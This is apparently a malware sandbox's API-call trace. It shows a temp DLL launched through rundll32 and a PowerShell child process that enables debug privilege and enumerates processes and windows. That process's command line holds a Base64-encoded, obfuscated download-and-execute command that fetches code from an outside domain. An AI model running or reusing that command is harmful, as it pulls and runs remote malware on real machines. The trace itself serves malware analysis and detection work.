	[0969.409] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\RUNDLL32.EXE.ps1", lpFindFileData=0x1c7dd240 | out: lpFindFileData=0x1c7dd240*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0969.416] SetErrorMode (uMode=0x1) returned 0x1
	[0969.417] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7dd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0969.417] SetErrorMode (uMode=0x1) returned 0x1
	[0969.417] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\RUNDLL32.EXE.psm1", lpFindFileData=0x1c7dd240 | out: lpFindFileData=0x1c7dd240*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0969.429] FindNextFileW (in: hFindFile=0x1ccb6270, lpFindFileData=0x1c7dd250 | out: lpFindFileData=0x1c7dd250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b22889, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xa8b22889, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xef0b1d90, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="rundll32.exe", cAlternateFileName="")) returned 0
	[0969.429] FindClose (in: hFindFile=0x1ccb6270 | out: hFindFile=0x1ccb6270) returned 1
	[0969.429] SetErrorMode (uMode=0x1) returned 0x1
	[0969.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe", nBufferLength=0x105, lpBuffer=0x1c7dd360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\rundll32.exe", lpFilePart=0x0) returned 0x20
	[0969.430] SetErrorMode (uMode=0x1) returned 0x1
	[0969.430] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd570 | out: lpFileInformation=0x1c7dd570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b22889, ftCreationTime.dwHighDateTime=0x1ca0415, ftLastAccessTime.dwLowDateTime=0xa8b22889, ftLastAccessTime.dwHighDateTime=0x1ca0415, ftLastWriteTime.dwLowDateTime=0xef0b1d90, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xb200)) returned 1
	[0969.430] SetErrorMode (uMode=0x1) returned 0x1
	[0969.431] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0969.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.431] CoTaskMemFree (pv=0x445e70) 
	[0969.433] CoTaskMemAlloc (cb=0x104) returned 0x445e70
	[0969.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x445e70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0969.433] CoTaskMemFree (pv=0x445e70) 
	[0969.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0969.625] SetErrorMode (uMode=0x1) returned 0x1
	[0969.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd0e0 | out: lpFileInformation=0x1c7dd0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0969.625] SetErrorMode (uMode=0x1) returned 0x1
	[0969.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7dce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0969.625] SetErrorMode (uMode=0x1) returned 0x1
	[0969.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1c7dd0e0 | out: lpFileInformation=0x1c7dd0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0969.625] SetErrorMode (uMode=0x1) returned 0x1
	[0969.628] LocalAlloc (uFlags=0x0, uBytes=0x42) returned 0x1cccb430
	[0969.629] RtlMoveMemory (in: Destination=0x1cccb430, Source=0x2ed4520, Length=0x42 | out: Destination=0x1cccb430) 
	[0969.629] LocalAlloc (uFlags=0x0, uBytes=0x70) returned 0x1ccc3fd0
	[0969.629] RtlMoveMemory (in: Destination=0x1ccc3fd0, Source=0x2ed5358, Length=0x70 | out: Destination=0x1ccc3fd0) 
	[0969.629] LocalAlloc (uFlags=0x0, uBytes=0x28) returned 0x1b8cabc0
	[0969.629] RtlMoveMemory (in: Destination=0x1b8cabc0, Source=0x2edd640, Length=0x28 | out: Destination=0x1b8cabc0) 
	[0972.243] LocalFree (hMem=0x1cccb430) returned 0x0
	[0972.243] LocalFree (hMem=0x1ccc3fd0) returned 0x0
	[0972.243] LocalFree (hMem=0x1b8cabc0) returned 0x0
	[0972.244] NtQueryInformationProcess (in: ProcessHandle=0x6e8, ProcessInformationClass=0x0, ProcessInformation=0x2edde88, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x2edde88, ReturnLength=0x0) returned 0x0
	[0972.246] EnumProcesses (in: lpidProcess=0x2edded0, cb=0x400, lpcbNeeded=0x1c7dd940 | out: lpidProcess=0x2edded0, lpcbNeeded=0x1c7dd940) returned 1
	[0972.259] EnumProcesses (in: lpidProcess=0x2ede2e8, cb=0x800, lpcbNeeded=0x1c7dd940 | out: lpidProcess=0x2ede2e8, lpcbNeeded=0x1c7dd940) returned 1
	[0972.264] EnumProcesses (in: lpidProcess=0x2edeb00, cb=0x1000, lpcbNeeded=0x1c7dd940 | out: lpidProcess=0x2edeb00, lpcbNeeded=0x1c7dd940) returned 1
	[0972.833] SetEvent (hEvent=0x338) returned 1
	[0972.833] SetEvent (hEvent=0x32c) returned 1
	[0972.833] SetEvent (hEvent=0x330) returned 1
	[0972.834] SetEvent (hEvent=0x334) returned 1
	[0972.834] SetEvent (hEvent=0x348) returned 1
	[0972.834] SetEvent (hEvent=0x33c) returned 1
	[0972.834] SetEvent (hEvent=0x340) returned 1
	[0972.834] SetEvent (hEvent=0x344) returned 1
	[0972.834] SetEvent (hEvent=0x3a8) returned 1
	[0972.837] CoUninitialize () 

Thread:
	id = 1777
	os_tid = 0x23f4


Thread:
	id = 1784
	os_tid = 0x1c30


Thread:
	id = 1789
	os_tid = 0x1df0

	[0840.907] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0840.911] ResetEvent (hEvent=0x384) returned 1

Thread:
	id = 1830
	os_tid = 0x240c


Thread:
	id = 2122
	os_tid = 0x1900

	[0970.665] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
	[0970.672] ShellExecuteExW (in: pExecInfo=0x2eddc28*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\system32\\rundll32.exe", lpParameters="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\vThQexNegi.dll,f0 ", lpDirectory="C:\\Windows\\system32", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2eddc28*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\system32\\rundll32.exe", lpParameters="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\vThQexNegi.dll,f0 ", lpDirectory="C:\\Windows\\system32", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x6e8)) returned 1
	[0970.881] CoGetContextToken (in: pToken=0x1ce9f9f0 | out: pToken=0x1ce9f9f0) returned 0x0
	[0972.205] CoUninitialize () 

Thread:
	id = 2130
	os_tid = 0x1818

	[0973.554] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0973.557] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0973.569] VirtualQuery (in: lpAddress=0x1c7dd880, lpBuffer=0x1c7de740, dwLength=0x30 | out: lpBuffer=0x1c7de740*(BaseAddress=0x1c7dd000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0973.569] VirtualQuery (in: lpAddress=0x1c7ddb30, lpBuffer=0x1c7de9f0, dwLength=0x30 | out: lpBuffer=0x1c7de9f0*(BaseAddress=0x1c7dd000, AllocationBase=0x1be50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0973.577] SetEvent (hEvent=0x3ac) returned 1
	[0973.577] SetEvent (hEvent=0x4e0) returned 1
	[0973.577] SetEvent (hEvent=0x38c) returned 1
	[0973.577] SetEvent (hEvent=0x3ac) returned 1
	[0973.577] SetEvent (hEvent=0x4e0) returned 1
	[0973.577] SetEvent (hEvent=0x3b4) returned 1
	[0973.578] SetEvent (hEvent=0x380) returned 1
	[0973.578] SetEvent (hEvent=0x3b0) returned 1
	[0973.578] SetEvent (hEvent=0x390) returned 1
	[0973.578] SetEvent (hEvent=0x6e0) returned 1
	[0974.061] CoUninitialize () 

Process:
	id = "58"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x19a22000"
	os_pid = "0xf18"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "3"
	os_parent_pid = "0x7a8"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 308
	os_tid = 0xf1c

	[0483.634] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0486.122] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0486.123] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0486.123] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0486.123] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0494.386] GetVersionExW (in: lpVersionInformation=0x28dfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28dfc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0494.389] GetVersionExW (in: lpVersionInformation=0x28dfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28dfc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0494.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0495.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28dc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0495.211] GetVersionExW (in: lpVersionInformation=0x28dd30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28dd30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0495.212] SetErrorMode (uMode=0x1) returned 0x1
	[0495.213] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28de90 | out: lpFileInformation=0x28de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0495.214] SetErrorMode (uMode=0x1) returned 0x1
	[0495.217] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28e100 | out: lpdwHandle=0x28e100) returned 0x94c
	[0495.219] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ce72a0 | out: lpData=0x2ce72a0) returned 1
	[0495.221] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28e078, puLen=0x28e070 | out: lplpBuffer=0x28e078*=0x2ce733c, puLen=0x28e070) returned 1
	[0495.223] lstrlenW (lpString="䅁") returned 1
	[0495.232] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x2ce7418, puLen=0x28dfe0) returned 1
	[0495.233] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0495.235] CoTaskMemAlloc (cb=0x2e) returned 0x3e8d10
	[0495.235] lstrcpyW (in: lpString1=0x3e8d10, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0495.236] CoTaskMemFree (pv=0x3e8d10) 
	[0495.236] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x2ce746c, puLen=0x28dfe0) returned 1
	[0495.236] lstrlenW (lpString="System.Management.Automation") returned 28
	[0495.236] CoTaskMemAlloc (cb=0x3c) returned 0x3ba010
	[0495.236] lstrcpyW (in: lpString1=0x3ba010, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0495.236] CoTaskMemFree (pv=0x3ba010) 
	[0495.236] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x2ce74c8, puLen=0x28dfe0) returned 1
	[0495.236] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0495.236] CoTaskMemAlloc (cb=0x20) returned 0x488460
	[0495.236] lstrcpyW (in: lpString1=0x488460, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0495.236] CoTaskMemFree (pv=0x488460) 
	[0495.236] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x2ce7508, puLen=0x28dfe0) returned 1
	[0495.237] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0495.237] CoTaskMemAlloc (cb=0x44) returned 0x3ba010
	[0495.237] lstrcpyW (in: lpString1=0x3ba010, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0495.237] CoTaskMemFree (pv=0x3ba010) 
	[0495.237] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x2ce7570, puLen=0x28dfe0) returned 1
	[0495.237] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0495.237] CoTaskMemAlloc (cb=0x76) returned 0x4271e0
	[0495.237] lstrcpyW (in: lpString1=0x4271e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0495.237] CoTaskMemFree (pv=0x4271e0) 
	[0495.237] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x2ce760c, puLen=0x28dfe0) returned 1
	[0495.237] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0495.237] CoTaskMemAlloc (cb=0x44) returned 0x3ba010
	[0495.237] lstrcpyW (in: lpString1=0x3ba010, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0495.237] CoTaskMemFree (pv=0x3ba010) 
	[0495.237] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x2ce7670, puLen=0x28dfe0) returned 1
	[0495.237] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0495.237] CoTaskMemAlloc (cb=0x58) returned 0x3d67e0
	[0495.237] lstrcpyW (in: lpString1=0x3d67e0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0495.237] CoTaskMemFree (pv=0x3d67e0) 
	[0495.237] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x2ce76ec, puLen=0x28dfe0) returned 1
	[0495.237] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0495.237] CoTaskMemAlloc (cb=0x20) returned 0x488460
	[0495.238] lstrcpyW (in: lpString1=0x488460, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0495.238] CoTaskMemFree (pv=0x488460) 
	[0495.238] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x2ce7394, puLen=0x28dfe0) returned 1
	[0495.238] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0495.238] CoTaskMemAlloc (cb=0x66) returned 0x3eb8d0
	[0495.238] lstrcpyW (in: lpString1=0x3eb8d0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0495.238] CoTaskMemFree (pv=0x3eb8d0) 
	[0495.238] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x0, puLen=0x28dfe0) returned 0
	[0495.238] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x0, puLen=0x28dfe0) returned 0
	[0495.238] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28dfe8, puLen=0x28dfe0 | out: lplpBuffer=0x28dfe8*=0x0, puLen=0x28dfe0) returned 0
	[0495.238] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28dfb8, puLen=0x28dfb0 | out: lplpBuffer=0x28dfb8*=0x2ce733c, puLen=0x28dfb0) returned 1
	[0495.239] CoTaskMemAlloc (cb=0x204) returned 0x419ef0
	[0495.239] VerLanguageNameW (in: wLang=0x0, szLang=0x419ef0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0495.240] CoTaskMemFree (pv=0x419ef0) 
	[0495.241] VerQueryValueW (in: pBlock=0x2ce72a0, lpSubBlock="\\", lplpBuffer=0x28e008, puLen=0x28e000 | out: lplpBuffer=0x28e008*=0x2ce72c8, puLen=0x28e000) returned 1
	[0495.995] GetCurrentProcessId () returned 0xf18
	[0496.034] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x28cf30 | out: lpLuid=0x28cf30*(LowPart=0x14, HighPart=0)) returned 1
	[0496.037] GetCurrentProcess () returned 0xffffffffffffffff
	[0496.038] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x28cf50 | out: TokenHandle=0x28cf50*=0x2f4) returned 1
	[0496.038] AdjustTokenPrivileges (in: TokenHandle=0x2f4, DisableAllPrivileges=0, NewState=0x2ceab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0496.040] CloseHandle (hObject=0x2f4) returned 1
	[0496.044] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf18) returned 0x2f4
	[0496.796] EnumProcessModules (in: hProcess=0x2f4, lphModule=0x2ceab80, cb=0x200, lpcbNeeded=0x28df68 | out: lphModule=0x2ceab80, lpcbNeeded=0x28df68) returned 1
	[0496.798] GetModuleInformation (in: hProcess=0x2f4, hModule=0x13f370000, lpmodinfo=0x2ceadf0, cb=0x18 | out: lpmodinfo=0x2ceadf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0496.799] CoTaskMemAlloc (cb=0x804) returned 0x490020
	[0496.799] GetModuleBaseNameW (in: hProcess=0x2f4, hModule=0x13f370000, lpBaseName=0x490020, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0496.800] CoTaskMemFree (pv=0x490020) 
	[0496.800] CoTaskMemAlloc (cb=0x804) returned 0x490020
	[0496.800] GetModuleFileNameExW (in: hProcess=0x2f4, hModule=0x13f370000, lpFilename=0x490020, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0496.801] CoTaskMemFree (pv=0x490020) 
	[0496.801] CloseHandle (hObject=0x2f4) returned 1
	[0496.809] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf18) returned 0x2f4
	[0496.810] GetExitCodeProcess (in: hProcess=0x2f4, lpExitCode=0x28e098 | out: lpExitCode=0x28e098*=0x103) returned 1
	[0496.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ceb088, Length=0x20000, ResultLength=0x28e060 | out: SystemInformation=0x12ceb088, ResultLength=0x28e060*=0x2eca0) returned 0xc0000004
	[0496.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d0b0b8, Length=0x314a0, ResultLength=0x28e060 | out: SystemInformation=0x12d0b0b8, ResultLength=0x28e060*=0x2eca0) returned 0x0
	[0497.585] EnumWindows (lpEnumFunc=0x2ad66ac, lParam=0x0) 
	[0501.139] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0501.638] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x558
	[0501.640] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0501.641] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0503.589] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x4d0
	[0503.590] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x28ddc0 | out: lpdwProcessId=0x28ddc0) returned 0x538
